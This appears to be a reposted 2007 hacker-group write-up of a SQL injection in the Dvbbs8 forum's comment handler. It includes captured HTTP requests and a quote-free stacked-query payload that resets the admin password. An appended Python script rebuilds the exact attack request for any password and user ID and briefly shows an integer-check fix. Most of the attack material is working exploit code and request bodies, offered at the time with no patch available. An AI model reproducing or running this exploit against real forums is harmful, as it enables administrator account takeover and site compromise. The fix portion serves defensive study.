================================================================================
[Original]
Dvbbs8 Vulnerability
By allyesno [at] 77169.org
Assume a Dvbbs8 (SQL Server edition) install is already set up:
Register an ordinary user and pick any post (the one I just used for testing is broken, so I re-posted one). Open the post, click to leave a comment (appraise), and capture the request:
POST /dvbbs8/appraise.asp?action=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://192.168.1.91/dvbbs8/dispbbs.asp?boardid=1&id=2&page=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
Host: 192.168.1.91
Content-Length: 91
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: dvforum=userid=3&usercookies=0&statuserid=197615644&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=allyesno&password=v0qdt2f765u6x7j5&userhidden=2; w0802=3; rtime=0; ltime=1186473801000; w08_eid=88452409-http%3A//192.168.1.91/dvbbs8/index.asp%3fboardid%3d1; geturl=%2fdvbbs8%2fpost%5fupload%2easp%3fboardid%3d1; ASPSESSIONIDACCRCQQQ=disabled; dvbbs=cacgffcf; upnum=0

boardid=1&topicid=2&announceid=2&atype=0&a1=0&a2=0&atitle=11111&acodestr=0425&acontent=test
OK, let's start.
First something harmless, just to play around: userpost is the column holding the user's post count. Tampering with it through the topicid field returns an error page:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near ';'.
/dvbbs8/inc/dv_clsmain.asp, line 1504
Ignore that error; the modification has in fact gone through. The profile now shows:
Posts: 100
Let's carry on modifying things. There is one small hurdle in the code to deal with first:
topicid = Dvbbs.CheckStr(Request.Form("topicid"))

Public Function CheckStr(str)
    ' Null input becomes the empty string
    If IsNull(str) Then
        CheckStr = ""
        Exit Function
    End If
    ' Strip NUL bytes, then double any single quote
    str = Replace(str, Chr(0), "")
    CheckStr = Replace(str, "'", "''")
End Function

Obviously single quotes get escaped (doubled), and nothing else. But topicid goes into the query as a bare number, so we never need a quote at all: a stacked statement can be appended straight after the number, and any string value it needs can be written as a hex literal. That gets us past it.
Now change the admin password. It is currently admin888; we'll set it to 123456. Dvbbs stores the 16-character MD5 of the password, which for 123456 is 49ba59abbe56e057; encoded as a UTF-16LE hex literal (what a sysname variable holds) it becomes the value below, so the whole statement contains no quote:

declare @a sysname
select @a=0x3400390062006100350039006100620062006500350036006500300035003700
update [dv_user] set userpassword=@a where userid=1

Modification successful!!! Then we change it back.
URL-encoded and appended to the topicid value, the same statement looks like this:

%3bdeclare+@a+sysname+select+@a%3d0x3400390062006100350039006100620062006500350036006500300035003700+update+dv%5fuser+set+userpassword%3d@a+where+userid%3d1

OK, this statement can also be executed as is. Its encoded length is 156 bytes, which accounts for the Content-Length of the request below.
POST /dvbbs8/appraise.asp?action=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://192.168.1.91/dvbbs8/dispbbs.asp?boardid=1&id=3&page=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
Host: 192.168.1.91
Content-Length: 242
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: dvforum=userid=3&usercookies=0&statuserid=197615644&userclass=%C2%DB%CC%B3%D3%CE%C3%F1&username=allyesno&password=y1tgx4j886xtb846&userhidden=2; list=list1=1; w0802=5; rtime=0; ltime=1186474916718; w08_eid=88452409-http%3A//192.168.1.91/dvbbs8/index.asp%3fboardid%3d1; geturl=%2fdvbbs8%2fpost%5fupload%2easp%3fboardid%3d1; ASPSESSIONIDACCRCQQQ=disabled; dvbbs=cacgffcf; upnum=0

boardid=1&topicid=3%3bdeclare+@a+sysname+select+@a%3d0x3400390062006100350039006100620062006500350036006500300035003700+update+dv%5fuser+set+userpassword%3d@a+where+userid%3d1&announceid=3&atype=0&a1=0&a2=0&atitle=22&acodestr=3297&acontent=33
Check the admin account: the password is now 123456.
This is a severe vulnerability, please use it with caution. The official site has not released a patch!!!
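To make the mechanics concrete, here is an added example (my code, not the author's and not Dvbbs's) that ports CheckStr() to Python, regenerates the hex literal and the URL-encoded payload above from the plaintext 123456, rebuilds the 242-byte request body, and shows the integer check that would have closed the hole. The query text in build_topicid_query is a hypothetical stand-in for the statement at dv_clsmain.asp line 1504 (the page shows only the error location), and the "middle 16 characters of MD5" rule is my assumption about how Dvbbs stores passwords; it is what the page's hex literal decodes to.

```python
import hashlib


# --- what the forum does with the field (ported from the VBScript above) ---

def checkstr(s):
    """Port of Dvbbs8's CheckStr(): drop NUL bytes, double single quotes.
    That is the only sanitisation topicid receives."""
    if s is None:
        return ""
    s = s.replace("\x00", "")
    return s.replace("'", "''")


def build_topicid_query(topicid_form_value):
    """Hypothetical statement standing in for the one at dv_clsmain.asp line 1504
    (assumption: the page shows only the error location). What matters is that
    topicid is concatenated in as a bare number with no quotes around it."""
    return "select * from dv_topic where topicid=" + checkstr(topicid_form_value)


def build_topicid_query_fixed(topicid_form_value):
    """Hardened form: coerce to an integer before the value reaches SQL, so a
    stacked statement cannot survive. int() raises ValueError on bad input,
    which is the right outcome; rejecting beats 'cleaning'."""
    return "select * from dv_topic where topicid=%d" % int(topicid_form_value)


# --- reproducing the page's payload for the new password 123456 ---

def dvbbs_password_hash(plaintext):
    """Assumed Dvbbs storage format: characters 9..24 of the MD5 hex digest."""
    return hashlib.md5(plaintext.encode("ascii")).hexdigest()[8:24]


def sysname_hex_literal(text):
    """0x... literal that assigns `text` to a sysname (nvarchar) variable.
    SQL Server expects UTF-16LE bytes, hence the 00 after every ASCII char."""
    return "0x" + text.encode("utf-16-le").hex()


def build_password_payload(new_password, target_userid=1):
    """The stacked tail appended to the numeric topicid. It contains no single
    quote, so checkstr() passes it through unchanged."""
    literal = sysname_hex_literal(dvbbs_password_hash(new_password))
    return (";declare @a sysname select @a=" + literal
            + " update dv_user set userpassword=@a where userid=%d" % target_userid)


def form_encode(text):
    """Encode the way the page's request body shows it: space -> '+', ASCII
    alphanumerics and '@' untouched, everything else as lowercase %xx."""
    out = []
    for ch in text:
        if ch.isascii() and (ch.isalnum() or ch == "@"):
            out.append(ch)
        elif ch == " ":
            out.append("+")
        else:
            out.append("%%%02x" % ord(ch))
    return "".join(out)


def build_request_body(topicid, payload, atitle="22", acodestr="3297", acontent="33"):
    """Body of the POST to appraise.asp?action=save. acodestr is the per-request
    captcha value; the defaults are the values captured on this page."""
    fields = [
        ("boardid", "1"),
        ("topicid", "%d%s" % (topicid, payload)),
        ("announceid", str(topicid)),
        ("atype", "0"), ("a1", "0"), ("a2", "0"),
        ("atitle", atitle), ("acodestr", acodestr), ("acontent", acontent),
    ]
    return "&".join(k + "=" + form_encode(v) for k, v in fields)


if __name__ == "__main__":
    p = build_password_payload("123456")
    print(build_topicid_query("3" + p))        # stacked UPDATE survives checkstr()
    body = build_request_body(3, p)
    print("Content-Length:", len(body))        # 242, as in the captured request
    print(body)
```

Running it prints the injected query, the body from the second capture above byte for byte, and the matching Content-Length; swapping in build_topicid_query_fixed raises ValueError on the same input, which is the whole fix.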
================================================================================ Huaxia Hacker Alliance ------
2007.8.7